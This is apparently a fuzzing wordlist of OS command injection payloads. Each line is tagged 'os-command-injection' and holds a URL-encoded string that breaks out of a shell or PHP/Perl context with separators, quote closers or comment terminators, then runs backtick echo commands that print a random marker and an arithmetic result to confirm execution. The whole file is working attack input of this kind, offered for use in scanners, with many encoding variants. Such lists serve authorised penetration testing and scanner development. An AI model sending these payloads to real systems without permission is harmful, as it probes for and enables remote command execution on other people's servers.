+os-command-injection,'%26%26echo$IFSJMVDAO$((52%2B94))$(echo$IFSJMVDAO)JMVDAO%26' +os-command-injection,'%7Cecho$IFSRKAPVH$((51%2B24))$(echo$IFSRKAPVH)RKAPVH%26' +os-command-injection,'%7C%7Cecho$IFSKGBLOE$((27%2B72))$(echo$IFSKGBLOE)KGBLOE%26' +os-command-injection,'echo$IFSXZNCQP$((56%2B62))$(echo$IFSXZNCQP)XZNCQP%7C' +os-command-injection,'%20echo%20VYWJPM$((40%2B5))$(echo%20VYWJPM)VYWJPM%7C' +os-command-injection,';echo$IFSXTEPMK$((70%2B42))$(echo$IFSXTEPMK)XTEPMK%7C' +os-command-injection,'&echo$IFSBVUDYH$((40%2B0))$(echo$IFSBVUDYH)BVUDYH%7C' +os-command-injection,'|echo$IFSGIHYII$((20%2B80))$(echo$IFSGIHYII)GIHYII%7C' +os-command-injection,'||echo$IFSUNKBIA$((84%2B96))$(echo$IFSUNKBIA)UNKBIA%7C' +os-command-injection,'&&echo$IFSQOTWYJ$((4%2B30))$(echo$IFSQOTWYJ)QOTWYJ%7C' +os-command-injection,'%0aecho$IFSTCNIRU$((23%2B88))$(echo$IFSTCNIRU)TCNIRU%7C' +os-command-injection,'%3Becho$IFSCFUQON$((7%2B1))$(echo$IFSCFUQON)CFUQON%7C' +os-command-injection,'%26echo$IFSCNSGBG$((72%2B11))$(echo$IFSCNSGBG)CNSGBG%7C' +os-command-injection,'%26%26echo$IFSYLKPEL$((22%2B81))$(echo$IFSYLKPEL)YLKPEL%7C' +os-command-injection,'%7Cecho$IFSLBCAYT$((13%2B58))$(echo$IFSLBCAYT)LBCAYT%7C' +os-command-injection,'%7C%7Cecho$IFSEXCORO$((79%2B26))$(echo$IFSEXCORO)EXCORO%7C' +os-command-injection,'print(`echo%20BAYPKT`.`echo%20$((43%2B10))`.`echo%20BAYPKT`.`echo%20BAYPKT`)%3BBAYPKT' +os-command-injection,'print(`echo%20DWYWNU;echo%20$((31%2B36));echo%20DWYWNU;echo%20DWYWNU`)%3BDWYWNU' +os-command-injection,'print(`echo%20OKEJJB%0aecho%20$((46%2B60))%0aecho%20OKEJJB%0aecho%20OKEJJB`)%3BOKEJJB' +os-command-injection,'print(`echo%20COMCFL\necho%20$((84%2B79))\necho%20COMCFL\necho%20COMCFL`)%3BCOMCFL' +os-command-injection,'print(`echo%20ADZJNM`.`echo%20$((71%2B71))`.`echo%20ADZJNM`.`echo%20ADZJNM`)%3B%5C%5CADZJNM' +os-command-injection,'print(`echo%20DEGOPG;echo%20$((38%2B61));echo%20DEGOPG;echo%20DEGOPG`)%3B%255C%255CDEGOPG' +os-command-injection,'print(`echo%20QGZDYY%0aecho%20$((26%2B56))%0aecho%20QGZDYY%0aecho%20QGZDYY`)%3B%25255C%25255CQGZDYY' +os-command-injection,'print(`echo%20DAESAZ\necho%20$((6%2B17))\necho%20DAESAZ\necho%20DAESAZ`)%3B%2525255C%2525255CDAESAZ' +os-command-injection,'print(`echo%20OSGUGU`.`echo%20$((64%2B8))`.`echo%20OSGUGU`.`echo%20OSGUGU`)%3B//OSGUGU' +os-command-injection,'print(`echo%20LPXWJK;echo%20$((35%2B1));echo%20LPXWJK;echo%20LPXWJK`)%3B//LPXWJK' +os-command-injection,'print(`echo%20XEMHBO%0aecho%20$((11%2B24))%0aecho%20XEMHBO%0aecho%20XEMHBO`)%3B//XEMHBO' +os-command-injection,'print(`echo%20ETZHWZ\necho%20$((20%2B88))\necho%20ETZHWZ\necho%20ETZHWZ`)%3B//ETZHWZ' +os-command-injection,'print(`echo%20GENLGI`.`echo%20$((14%2B11))`.`echo%20GENLGI`.`echo%20GENLGI`)%3B%23GENLGI' +os-command-injection,'print(`echo%20DYZZIW;echo%20$((94%2B81));echo%20DYZZIW;echo%20DYZZIW`)%3B%2523DYZZIW' +os-command-injection,'print(`echo%20UBBYNF%0aecho%20$((67%2B26))%0aecho%20UBBYNF%0aecho%20UBBYNF`)%3B%252523UBBYNF' +os-command-injection,'print(`echo%20EIPAAC\necho%20$((42%2B82))\necho%20EIPAAC\necho%20EIPAAC`)%3B%25252523EIPAAC' +os-command-injection,'print(`echo%20WQMIIN`.`echo%20$((36%2B90))`.`echo%20WQMIIN`.`echo%20WQMIIN`)%3B.%22WQMIIN' +os-command-injection,'print(`echo%20NSKJQW;echo%20$((41%2B11));echo%20NSKJQW;echo%20NSKJQW`)%3B.%2522NSKJQW' +os-command-injection,'print(`echo%20DBCNNO%0aecho%20$((39%2B97))%0aecho%20DBCNNO%0aecho%20DBCNNO`)%3B.%252522DBCNNO' +os-command-injection,'print(`echo%20GDOHGQ\necho%20$((28%2B89))\necho%20GDOHGQ\necho%20GDOHGQ`)%3B.%25252522GDOHGQ' +os-command-injection,'print(`echo%20RREYBJ`.`echo%20$((33%2B25))`.`echo%20RREYBJ`.`echo%20RREYBJ`)%3B.%27RREYBJ' +os-command-injection,'print(`echo%20PFLDED;echo%20$((95%2B99));echo%20PFLDED;echo%20PFLDED`)%3B.%2527PFLDED' +os-command-injection,'print(`echo%20TVCCND%0aecho%20$((62%2B6))%0aecho%20TVCCND%0aecho%20TVCCND`)%3B.%252527TVCCND' +os-command-injection,'print(`echo%20HHRISK\necho%20$((73%2B42))\necho%20HHRISK\necho%20HHRISK`)%3B.%25252527HHRISK' +os-command-injection,'print(`echo%20WZLIFQ`.`echo%20$((3%2B42))`.`echo%20WZLIFQ`.`echo%20WZLIFQ`)%29%7DWZLIFQ' +os-command-injection,'print(`echo%20ZHAWPM;echo%20$((18%2B57));echo%20ZHAWPM;echo%20ZHAWPM`)%3B%2529%257DZHAWPM' +os-command-injection,'print(`echo%20XWPSAV%0aecho%20$((22%2B11))%0aecho%20XWPSAV%0aecho%20XWPSAV`)%3B%252529%25257DXWPSAV' +os-command-injection,'print(`echo%20BQVIXY\necho%20$((53%2B95))\necho%20BQVIXY\necho%20BQVIXY`)%3B%25252529%2525257DBQVIXY' +os-command-injection,''print(`echo%20DUAYMM`.`echo%20$((77%2B73))`.`echo%20DUAYMM`.`echo%20DUAYMM`)%3BDUAYMM' +os-command-injection,''print(`echo%20TUDOUK;echo%20$((63%2B88));echo%20TUDOUK;echo%20TUDOUK`)%3BTUDOUK' +os-command-injection,''print(`echo%20AHOHOK%0aecho%20$((14%2B28))%0aecho%20AHOHOK%0aecho%20AHOHOK`)%3BAHOHOK' +os-command-injection,''print(`echo%20BRTYSY\necho%20$((74%2B40))\necho%20BRTYSY\necho%20BRTYSY`)%3BBRTYSY' +os-command-injection,''print(`echo%20DQLEND`.`echo%20$((63%2B84))`.`echo%20DQLEND`.`echo%20DQLEND`)%3B%5C%5CDQLEND' +os-command-injection,''print(`echo%20RAZRYE;echo%20$((84%2B60));echo%20RAZRYE;echo%20RAZRYE`)%3B%255C%255CRAZRYE' +os-command-injection,''print(`echo%20MURMGO%0aecho%20$((13%2B87))%0aecho%20MURMGO%0aecho%20MURMGO`)%3B%25255C%25255CMURMGO' +os-command-injection,''print(`echo%20WSILLK\necho%20$((70%2B70))\necho%20WSILLK\necho%20WSILLK`)%3B%2525255C%2525255CWSILLK' +os-command-injection,''print(`echo%20GGTKKU`.`echo%20$((23%2B93))`.`echo%20GGTKKU`.`echo%20GGTKKU`)%3B//GGTKKU' +os-command-injection,''print(`echo%20CRERAD;echo%20$((48%2B33));echo%20CRERAD;echo%20CRERAD`)%3B//CRERAD' +os-command-injection,''print(`echo%20STJAIG%0aecho%20$((89%2B81))%0aecho%20STJAIG%0aecho%20STJAIG`)%3B//STJAIG' +os-command-injection,''print(`echo%20CVFEYY\necho%20$((56%2B86))\necho%20CVFEYY\necho%20CVFEYY`)%3B//CVFEYY' +os-command-injection,''print(`echo%20KKQSRA`.`echo%20$((71%2B76))`.`echo%20KKQSRA`.`echo%20KKQSRA`)%3B%23KKQSRA' +os-command-injection,''print(`echo%20GSORDT;echo%20$((68%2B29));echo%20GSORDT;echo%20GSORDT`)%3B%2523GSORDT' +os-command-injection,''print(`echo%20TPBMFF%0aecho%20$((79%2B13))%0aecho%20TPBMFF%0aecho%20TPBMFF`)%3B%252523TPBMFF' +os-command-injection,''print(`echo%20WCPHMV\necho%20$((3%2B88))\necho%20WCPHMV\necho%20WCPHMV`)%3B%25252523WCPHMV' +os-command-injection,''print(`echo%20MKGGZP`.`echo%20$((69%2B92))`.`echo%20MKGGZP`.`echo%20MKGGZP`)%3B.%22MKGGZP' +os-command-injection,''print(`echo%20UPGYTK;echo%20$((49%2B93));echo%20UPGYTK;echo%20UPGYTK`)%3B.%2522UPGYTK' +os-command-injection,''print(`echo%20FQEMGW%0aecho%20$((58%2B2))%0aecho%20FQEMGW%0aecho%20FQEMGW`)%3B.%252522FQEMGW' +os-command-injection,''print(`echo%20UDOCFL\necho%20$((86%2B7))\necho%20UDOCFL\necho%20UDOCFL`)%3B.%25252522UDOCFL' +os-command-injection,''print(`echo%20ANYJLP`.`echo%20$((86%2B96))`.`echo%20ANYJLP`.`echo%20ANYJLP`)%3B.%27ANYJLP' +os-command-injection,''print(`echo%20ADRNCB;echo%20$((35%2B33));echo%20ADRNCB;echo%20ADRNCB`)%3B.%2527ADRNCB' +os-command-injection,''print(`echo%20AYKYLG%0aecho%20$((60%2B1))%0aecho%20AYKYLG%0aecho%20AYKYLG`)%3B.%252527AYKYLG' +os-command-injection,''print(`echo%20JIKWPW\necho%20$((92%2B0))\necho%20JIKWPW\necho%20JIKWPW`)%3B.%25252527JIKWPW' +os-command-injection,''print(`echo%20MLMZKH`.`echo%20$((30%2B25))`.`echo%20MLMZKH`.`echo%20MLMZKH`)%29%7DMLMZKH' +os-command-injection,''print(`echo%20RRMVOG;echo%20$((30%2B37));echo%20RRMVOG;echo%20RRMVOG`)%3B%2529%257DRRMVOG' +os-command-injection,''print(`echo%20BFUQZN%0aecho%20$((42%2B76))%0aecho%20BFUQZN%0aecho%20BFUQZN`)%3B%252529%25257DBFUQZN' +os-command-injection,''print(`echo%20AWHBQS\necho%20$((81%2B11))\necho%20AWHBQS\necho%20AWHBQS`)%3B%25252529%2525257DAWHBQS' +os-command-injection,')print(`echo%20VWOEOC`.`echo%20$((97%2B4))`.`echo%20VWOEOC`.`echo%20VWOEOC`)%3BVWOEOC' +os-command-injection,')print(`echo%20VIVSXO;echo%20$((60%2B28));echo%20VIVSXO;echo%20VIVSXO`)%3BVIVSXO' +os-command-injection,')print(`echo%20HQNHAD%0aecho%20$((91%2B64))%0aecho%20HQNHAD%0aecho%20HQNHAD`)%3BHQNHAD' +os-command-injection,')print(`echo%20MADCWE\necho%20$((88%2B74))\necho%20MADCWE\necho%20MADCWE`)%3BMADCWE' +os-command-injection,')print(`echo%20QQGYPS`.`echo%20$((10%2B39))`.`echo%20QQGYPS`.`echo%20QQGYPS`)%3B%5C%5CQQGYPS' +os-command-injection,')print(`echo%20DLBCJS;echo%20$((58%2B85));echo%20DLBCJS;echo%20DLBCJS`)%3B%255C%255CDLBCJS' +os-command-injection,')print(`echo%20UDBRRF%0aecho%20$((39%2B57))%0aecho%20UDBRRF%0aecho%20UDBRRF`)%3B%25255C%25255CUDBRRF' +os-command-injection,')print(`echo%20NLOFKT\necho%20$((26%2B86))\necho%20NLOFKT\necho%20NLOFKT`)%3B%2525255C%2525255CNLOFKT' +os-command-injection,')print(`echo%20PUEXZN`.`echo%20$((11%2B4))`.`echo%20PUEXZN`.`echo%20PUEXZN`)%3B//PUEXZN' +os-command-injection,')print(`echo%20IFOQRT;echo%20$((35%2B23));echo%20IFOQRT;echo%20IFOQRT`)%3B//IFOQRT' +os-command-injection,')print(`echo%20SYVAYV%0aecho%20$((36%2B49))%0aecho%20SYVAYV%0aecho%20SYVAYV`)%3B//SYVAYV' +os-command-injection,')print(`echo%20KPLWCF\necho%20$((96%2B6))\necho%20KPLWCF\necho%20KPLWCF`)%3B//KPLWCF' +os-command-injection,')print(`echo%20EHMRQP`.`echo%20$((92%2B22))`.`echo%20EHMRQP`.`echo%20EHMRQP`)%3B%23EHMRQP' +os-command-injection,')print(`echo%20ECXTUU;echo%20$((10%2B67));echo%20ECXTUU;echo%20ECXTUU`)%3B%2523ECXTUU' +os-command-injection,')print(`echo%20LXAMNA%0aecho%20$((68%2B25))%0aecho%20LXAMNA%0aecho%20LXAMNA`)%3B%252523LXAMNA' +os-command-injection,')print(`echo%20ASMFMR\necho%20$((34%2B56))\necho%20ASMFMR\necho%20ASMFMR`)%3B%25252523ASMFMR' +os-command-injection,')print(`echo%20HXXRRP`.`echo%20$((98%2B1))`.`echo%20HXXRRP`.`echo%20HXXRRP`)%3B.%22HXXRRP' +os-command-injection,')print(`echo%20SQLMHW;echo%20$((75%2B6));echo%20SQLMHW;echo%20SQLMHW`)%3B.%2522SQLMHW' +os-command-injection,')print(`echo%20DPBGWU%0aecho%20$((48%2B67))%0aecho%20DPBGWU%0aecho%20DPBGWU`)%3B.%252522DPBGWU' +os-command-injection,')print(`echo%20YKQUFP\necho%20$((94%2B91))\necho%20YKQUFP\necho%20YKQUFP`)%3B.%25252522YKQUFP' +os-command-injection,')print(`echo%20NNYPSL`.`echo%20$((56%2B33))`.`echo%20NNYPSL`.`echo%20NNYPSL`)%3B.%27NNYPSL' +os-command-injection,')print(`echo%20YIXKKR;echo%20$((83%2B25));echo%20YIXKKR;echo%20YIXKKR`)%3B.%2527YIXKKR' +os-command-injection,')print(`echo%20FGPZFR%0aecho%20$((7%2B1))%0aecho%20FGPZFR%0aecho%20FGPZFR`)%3B.%252527FGPZFR' +os-command-injection,')print(`echo%20EZVLWV\necho%20$((40%2B27))\necho%20EZVLWV\necho%20EZVLWV`)%3B.%25252527EZVLWV' +os-command-injection,')print(`echo%20GGCMZV`.`echo%20$((6%2B53))`.`echo%20GGCMZV`.`echo%20GGCMZV`)%29%7DGGCMZV' +os-command-injection,')print(`echo%20QADPCR;echo%20$((51%2B16));echo%20QADPCR;echo%20QADPCR`)%3B%2529%257DQADPCR' +os-command-injection,')print(`echo%20AFOMNK%0aecho%20$((45%2B23))%0aecho%20AFOMNK%0aecho%20AFOMNK`)%3B%252529%25257DAFOMNK' +os-command-injection,')print(`echo%20EVRVDK\necho%20$((98%2B18))\necho%20EVRVDK\necho%20EVRVDK`)%3B%25252529%2525257DEVRVDK' +os-command-injection,'')print(`echo%20KYHRZA`.`echo%20$((72%2B0))`.`echo%20KYHRZA`.`echo%20KYHRZA`)%3BKYHRZA' +os-command-injection,'')print(`echo%20ESWACN;echo%20$((37%2B82));echo%20ESWACN;echo%20ESWACN`)%3BESWACN' +os-command-injection,'')print(`echo%20BWPFXW%0aecho%20$((76%2B34))%0aecho%20BWPFXW%0aecho%20BWPFXW`)%3BBWPFXW' +os-command-injection,'')print(`echo%20EXVUXJ\necho%20$((73%2B54))\necho%20EXVUXJ\necho%20EXVUXJ`)%3BEXVUXJ' +os-command-injection,'')print(`echo%20SATCYU`.`echo%20$((51%2B26))`.`echo%20SATCYU`.`echo%20SATCYU`)%3B%5C%5CSATCYU' +os-command-injection,'')print(`echo%20BONGAS;echo%20$((69%2B7));echo%20BONGAS;echo%20BONGAS`)%3B%255C%255CBONGAS' +os-command-injection,'')print(`echo%20VPYMWX%0aecho%20$((10%2B22))%0aecho%20VPYMWX%0aecho%20VPYMWX`)%3B%25255C%25255CVPYMWX' +os-command-injection,'')print(`echo%20OXDDYE\necho%20$((75%2B92))\necho%20OXDDYE\necho%20OXDDYE`)%3B%2525255C%2525255COXDDYE' +os-command-injection,'')print(`echo%20NFASEM`.`echo%20$((28%2B31))`.`echo%20NFASEM`.`echo%20NFASEM`)%3B//NFASEM' +os-command-injection,'')print(`echo%20FCMKMZ;echo%20$((68%2B75));echo%20FCMKMZ;echo%20FCMKMZ`)%3B//FCMKMZ' +os-command-injection,'')print(`echo%20DWTUTD%0aecho%20$((10%2B15))%0aecho%20DWTUTD%0aecho%20DWTUTD`)%3B//DWTUTD' +os-command-injection,'')print(`echo%20EHPKWP\necho%20$((79%2B86))\necho%20EHPKWP\necho%20EHPKWP`)%3B//EHPKWP' +os-command-injection,'')print(`echo%20PWUTCR`.`echo%20$((0%2B3))`.`echo%20PWUTCR`.`echo%20PWUTCR`)%3B%23PWUTCR' +os-command-injection,'')print(`echo%20OFKEZB;echo%20$((35%2B78));echo%20OFKEZB;echo%20OFKEZB`)%3B%2523OFKEZB' +os-command-injection,'')print(`echo%20WUCPEY%0aecho%20$((63%2B16))%0aecho%20WUCPEY%0aecho%20WUCPEY`)%3B%252523WUCPEY' +os-command-injection,'')print(`echo%20MAOJQM\necho%20$((57%2B39))\necho%20MAOJQM\necho%20MAOJQM`)%3B%25252523MAOJQM' +os-command-injection,'')print(`echo%20VRYZVO`.`echo%20$((19%2B54))`.`echo%20VRYZVO`.`echo%20VRYZVO`)%3B.%22VRYZVO' +os-command-injection,'')print(`echo%20EVXXCT;echo%20$((87%2B15));echo%20EVXXCT;echo%20EVXXCT`)%3B.%2522EVXXCT' +os-command-injection,'')print(`echo%20JUEAPR%0aecho%20$((30%2B6))%0aecho%20JUEAPR%0aecho%20JUEAPR`)%3B.%252522JUEAPR' +os-command-injection,'')print(`echo%20XQTSKO\necho%20$((61%2B71))\necho%20XQTSKO\necho%20XQTSKO`)%3B.%25252522XQTSKO' +os-command-injection,'')print(`echo%20TYAJKR`.`echo%20$((73%2B69))`.`echo%20TYAJKR`.`echo%20TYAJKR`)%3B.%27TYAJKR' +os-command-injection,'')print(`echo%20EHVUCK;echo%20$((3%2B47));echo%20EHVUCK;echo%20EHVUCK`)%3B.%2527EHVUCK' +os-command-injection,'')print(`echo%20PMUZEH%0aecho%20$((73%2B89))%0aecho%20PMUZEH%0aecho%20PMUZEH`)%3B.%252527PMUZEH' +os-command-injection,'')print(`echo%20QTJEKD\necho%20$((90%2B98))\necho%20QTJEKD\necho%20QTJEKD`)%3B.%25252527QTJEKD' +os-command-injection,'')print(`echo%20RUXOHA`.`echo%20$((74%2B92))`.`echo%20RUXOHA`.`echo%20RUXOHA`)%29%7DRUXOHA' +os-command-injection,'')print(`echo%20VEMMAU;echo%20$((59%2B39));echo%20VEMMAU;echo%20VEMMAU`)%3B%2529%257DVEMMAU' +os-command-injection,'')print(`echo%20AGBHMS%0aecho%20$((79%2B32))%0aecho%20AGBHMS%0aecho%20AGBHMS`)%3B%252529%25257DAGBHMS' +os-command-injection,'')print(`echo%20VHLBFA\necho%20$((78%2B60))\necho%20VHLBFA\necho%20VHLBFA`)%3B%25252529%2525257DVHLBFA' +os-command-injection,'")print(`echo%20COMPTT`.`echo%20$((78%2B29))`.`echo%20COMPTT`.`echo%20COMPTT`)%3BCOMPTT' +os-command-injection,'")print(`echo%20OTTCBX;echo%20$((64%2B75));echo%20OTTCBX;echo%20OTTCBX`)%3BOTTCBX' +os-command-injection,'")print(`echo%20PPZHBZ%0aecho%20$((86%2B40))%0aecho%20PPZHBZ%0aecho%20PPZHBZ`)%3BPPZHBZ' +os-command-injection,'")print(`echo%20PHKGWS\necho%20$((9%2B71))\necho%20PHKGWS\necho%20PHKGWS`)%3BPHKGWS' +os-command-injection,'")print(`echo%20MOHYBU`.`echo%20$((61%2B5))`.`echo%20MOHYBU`.`echo%20MOHYBU`)%3B%5C%5CMOHYBU' +os-command-injection,'")print(`echo%20ATRPAE;echo%20$((77%2B72));echo%20ATRPAE;echo%20ATRPAE`)%3B%255C%255CATRPAE' +os-command-injection,'")print(`echo%20GHHJFR%0aecho%20$((52%2B63))%0aecho%20GHHJFR%0aecho%20GHHJFR`)%3B%25255C%25255CGHHJFR' +os-command-injection,'")print(`echo%20NBPPTV\necho%20$((1%2B63))\necho%20NBPPTV\necho%20NBPPTV`)%3B%2525255C%2525255CNBPPTV' +os-command-injection,'")print(`echo%20OZMQFI`.`echo%20$((35%2B9))`.`echo%20OZMQFI`.`echo%20OZMQFI`)%3B//OZMQFI' +os-command-injection,'")print(`echo%20HXHMHH;echo%20$((40%2B31));echo%20HXHMHH;echo%20HXHMHH`)%3B//HXHMHH' +os-command-injection,'")print(`echo%20OVQSQG%0aecho%20$((8%2B36))%0aecho%20OVQSQG%0aecho%20OVQSQG`)%3B//OVQSQG' +os-command-injection,'")print(`echo%20ULOIOS\necho%20$((51%2B30))\necho%20ULOIOS\necho%20ULOIOS`)%3B//ULOIOS' +os-command-injection,'")print(`echo%20CHKGSS`.`echo%20$((80%2B0))`.`echo%20CHKGSS`.`echo%20CHKGSS`)%3B%23CHKGSS' +os-command-injection,'")print(`echo%20KZZFJE;echo%20$((74%2B13));echo%20KZZFJE;echo%20KZZFJE`)%3B%2523KZZFJE' +os-command-injection,'")print(`echo%20RPOOHR%0aecho%20$((72%2B27))%0aecho%20RPOOHR%0aecho%20RPOOHR`)%3B%252523RPOOHR' +os-command-injection,'")print(`echo%20UKYEKY\necho%20$((70%2B74))\necho%20UKYEKY\necho%20UKYEKY`)%3B%25252523UKYEKY' +os-command-injection,'")print(`echo%20SGRKCG`.`echo%20$((91%2B4))`.`echo%20SGRKCG`.`echo%20SGRKCG`)%3B.%22SGRKCG' +os-command-injection,'")print(`echo%20SPKTID;echo%20$((50%2B54));echo%20SPKTID;echo%20SPKTID`)%3B.%2522SPKTID' +os-command-injection,'")print(`echo%20XCIHWH%0aecho%20$((57%2B90))%0aecho%20XCIHWH%0aecho%20XCIHWH`)%3B.%252522XCIHWH' +os-command-injection,'")print(`echo%20JNKGOO\necho%20$((17%2B90))\necho%20JNKGOO\necho%20JNKGOO`)%3B.%25252522JNKGOO' +os-command-injection,'")print(`echo%20QZFGHE`.`echo%20$((4%2B60))`.`echo%20QZFGHE`.`echo%20QZFGHE`)%3B.%27QZFGHE' +os-command-injection,'")print(`echo%20CAQHUJ;echo%20$((70%2B24));echo%20CAQHUJ;echo%20CAQHUJ`)%3B.%2527CAQHUJ' +os-command-injection,'")print(`echo%20ADFEOJ%0aecho%20$((67%2B57))%0aecho%20ADFEOJ%0aecho%20ADFEOJ`)%3B.%252527ADFEOJ' +os-command-injection,'")print(`echo%20GIKPYM\necho%20$((77%2B22))\necho%20GIKPYM\necho%20GIKPYM`)%3B.%25252527GIKPYM' +os-command-injection,'")print(`echo%20SPTGKB`.`echo%20$((57%2B66))`.`echo%20SPTGKB`.`echo%20SPTGKB`)%29%7DSPTGKB' +os-command-injection,'")print(`echo%20COYGWQ;echo%20$((40%2B21));echo%20COYGWQ;echo%20COYGWQ`)%3B%2529%257DCOYGWQ' +os-command-injection,'")print(`echo%20MMOCRN%0aecho%20$((88%2B99))%0aecho%20MMOCRN%0aecho%20MMOCRN`)%3B%252529%25257DMMOCRN' +os-command-injection,'")print(`echo%20BUJJSS\necho%20$((4%2B1))\necho%20BUJJSS\necho%20BUJJSS`)%3B%25252529%2525257DBUJJSS' +os-command-injection,'".print(`echo%20COYIQB`.`echo%20$((70%2B26))`.`echo%20COYIQB`.`echo%20COYIQB`)%3BCOYIQB' +os-command-injection,'".print(`echo%20UCUISA;echo%20$((65%2B31));echo%20UCUISA;echo%20UCUISA`)%3BUCUISA' +os-command-injection,'".print(`echo%20AGODDO%0aecho%20$((7%2B33))%0aecho%20AGODDO%0aecho%20AGODDO`)%3BAGODDO' +os-command-injection,'".print(`echo%20IFQMUW\necho%20$((62%2B32))\necho%20IFQMUW\necho%20IFQMUW`)%3BIFQMUW' +os-command-injection,'".print(`echo%20RZWFMA`.`echo%20$((75%2B86))`.`echo%20RZWFMA`.`echo%20RZWFMA`)%3B%5C%5CRZWFMA' +os-command-injection,'".print(`echo%20RVELEJ;echo%20$((74%2B30));echo%20RVELEJ;echo%20RVELEJ`)%3B%255C%255CRVELEJ' +os-command-injection,'".print(`echo%20ACGJLG%0aecho%20$((54%2B11))%0aecho%20ACGJLG%0aecho%20ACGJLG`)%3B%25255C%25255CACGJLG' +os-command-injection,'".print(`echo%20PZAGMU\necho%20$((23%2B82))\necho%20PZAGMU\necho%20PZAGMU`)%3B%2525255C%2525255CPZAGMU' +os-command-injection,'".print(`echo%20XBJBDE`.`echo%20$((48%2B93))`.`echo%20XBJBDE`.`echo%20XBJBDE`)%3B//XBJBDE' +os-command-injection,'".print(`echo%20EYOYIJ;echo%20$((34%2B58));echo%20EYOYIJ;echo%20EYOYIJ`)%3B//EYOYIJ' +os-command-injection,'".print(`echo%20WKFYWT%0aecho%20$((57%2B28))%0aecho%20WKFYWT%0aecho%20WKFYWT`)%3B//WKFYWT' +os-command-injection,'".print(`echo%20MKBEZC\necho%20$((61%2B47))\necho%20MKBEZC\necho%20MKBEZC`)%3B//MKBEZC' +os-command-injection,'".print(`echo%20POVQEX`.`echo%20$((96%2B65))`.`echo%20POVQEX`.`echo%20POVQEX`)%3B%23POVQEX' +os-command-injection,'".print(`echo%20MFYSPW;echo%20$((87%2B75));echo%20MFYSPW;echo%20MFYSPW`)%3B%2523MFYSPW' +os-command-injection,'".print(`echo%20DSHOEV%0aecho%20$((44%2B47))%0aecho%20DSHOEV%0aecho%20DSHOEV`)%3B%252523DSHOEV' +os-command-injection,'".print(`echo%20ULLCKQ\necho%20$((63%2B14))\necho%20ULLCKQ\necho%20ULLCKQ`)%3B%25252523ULLCKQ' +os-command-injection,'".print(`echo%20DFRGXJ`.`echo%20$((12%2B99))`.`echo%20DFRGXJ`.`echo%20DFRGXJ`)%3B.%22DFRGXJ' +os-command-injection,'".print(`echo%20EKDSZM;echo%20$((50%2B62));echo%20EKDSZM;echo%20EKDSZM`)%3B.%2522EKDSZM' +os-command-injection,'".print(`echo%20ZTFYUM%0aecho%20$((56%2B81))%0aecho%20ZTFYUM%0aecho%20ZTFYUM`)%3B.%252522ZTFYUM' +os-command-injection,'".print(`echo%20CEZYFB\necho%20$((70%2B98))\necho%20CEZYFB\necho%20CEZYFB`)%3B.%25252522CEZYFB' +os-command-injection,'".print(`echo%20HAMONB`.`echo%20$((26%2B57))`.`echo%20HAMONB`.`echo%20HAMONB`)%3B.%27HAMONB' +os-command-injection,'".print(`echo%20VFIBZQ;echo%20$((31%2B85));echo%20VFIBZQ;echo%20VFIBZQ`)%3B.%2527VFIBZQ' +os-command-injection,'".print(`echo%20XKLFAP%0aecho%20$((76%2B43))%0aecho%20XKLFAP%0aecho%20XKLFAP`)%3B.%252527XKLFAP' +os-command-injection,'".print(`echo%20DBTAFQ\necho%20$((79%2B27))\necho%20DBTAFQ\necho%20DBTAFQ`)%3B.%25252527DBTAFQ' +os-command-injection,'".print(`echo%20ZLVKDU`.`echo%20$((0%2B22))`.`echo%20ZLVKDU`.`echo%20ZLVKDU`)%29%7DZLVKDU' +os-command-injection,'".print(`echo%20HGIQEK;echo%20$((64%2B67));echo%20HGIQEK;echo%20HGIQEK`)%3B%2529%257DHGIQEK' +os-command-injection,'".print(`echo%20UFRBLO%0aecho%20$((1%2B17))%0aecho%20UFRBLO%0aecho%20UFRBLO`)%3B%252529%25257DUFRBLO' +os-command-injection,'".print(`echo%20MGGIBH\necho%20$((69%2B4))\necho%20MGGIBH\necho%20MGGIBH`)%3B%25252529%2525257DMGGIBH' +os-command-injection,''.print(`echo%20IQVVVA`.`echo%20$((38%2B34))`.`echo%20IQVVVA`.`echo%20IQVVVA`)%3BIQVVVA' +os-command-injection,''.print(`echo%20KHHFWC;echo%20$((15%2B27));echo%20KHHFWC;echo%20KHHFWC`)%3BKHHFWC' +os-command-injection,''.print(`echo%20NXDUHQ%0aecho%20$((28%2B78))%0aecho%20NXDUHQ%0aecho%20NXDUHQ`)%3BNXDUHQ' +os-command-injection,''.print(`echo%20XYCPFN\necho%20$((60%2B62))\necho%20XYCPFN\necho%20XYCPFN`)%3BXYCPFN' +os-command-injection,''.print(`echo%20KKDSRH`.`echo%20$((88%2B16))`.`echo%20KKDSRH`.`echo%20KKDSRH`)%3B%5C%5CKKDSRH' +os-command-injection,''.print(`echo%20QLKXYP;echo%20$((79%2B46));echo%20QLKXYP;echo%20QLKXYP`)%3B%255C%255CQLKXYP' +os-command-injection,''.print(`echo%20EVZCEK%0aecho%20$((38%2B37))%0aecho%20EVZCEK%0aecho%20EVZCEK`)%3B%25255C%25255CEVZCEK' +os-command-injection,''.print(`echo%20VXYNWW\necho%20$((29%2B16))\necho%20VXYNWW\necho%20VXYNWW`)%3B%2525255C%2525255CVXYNWW' +os-command-injection,''.print(`echo%20KVAVOQ`.`echo%20$((63%2B81))`.`echo%20KVAVOQ`.`echo%20KVAVOQ`)%3B//KVAVOQ' +os-command-injection,''.print(`echo%20GDFQZF;echo%20$((65%2B2));echo%20GDFQZF;echo%20GDFQZF`)%3B//GDFQZF' +os-command-injection,''.print(`echo%20SMJBZB%0aecho%20$((19%2B71))%0aecho%20SMJBZB%0aecho%20SMJBZB`)%3B//SMJBZB' +os-command-injection,''.print(`echo%20CXYKAU\necho%20$((56%2B15))\necho%20CXYKAU\necho%20CXYKAU`)%3B//CXYKAU' +os-command-injection,''.print(`echo%20VWGDMS`.`echo%20$((77%2B11))`.`echo%20VWGDMS`.`echo%20VWGDMS`)%3B%23VWGDMS' +os-command-injection,''.print(`echo%20DWVXEQ;echo%20$((13%2B19));echo%20DWVXEQ;echo%20DWVXEQ`)%3B%2523DWVXEQ' +os-command-injection,''.print(`echo%20YBQGFX%0aecho%20$((90%2B18))%0aecho%20YBQGFX%0aecho%20YBQGFX`)%3B%252523YBQGFX' +os-command-injection,''.print(`echo%20IYCMIH\necho%20$((35%2B93))\necho%20IYCMIH\necho%20IYCMIH`)%3B%25252523IYCMIH' +os-command-injection,''.print(`echo%20ULZFRM`.`echo%20$((96%2B62))`.`echo%20ULZFRM`.`echo%20ULZFRM`)%3B.%22ULZFRM' +os-command-injection,''.print(`echo%20MFFGYS;echo%20$((68%2B25));echo%20MFFGYS;echo%20MFFGYS`)%3B.%2522MFFGYS' 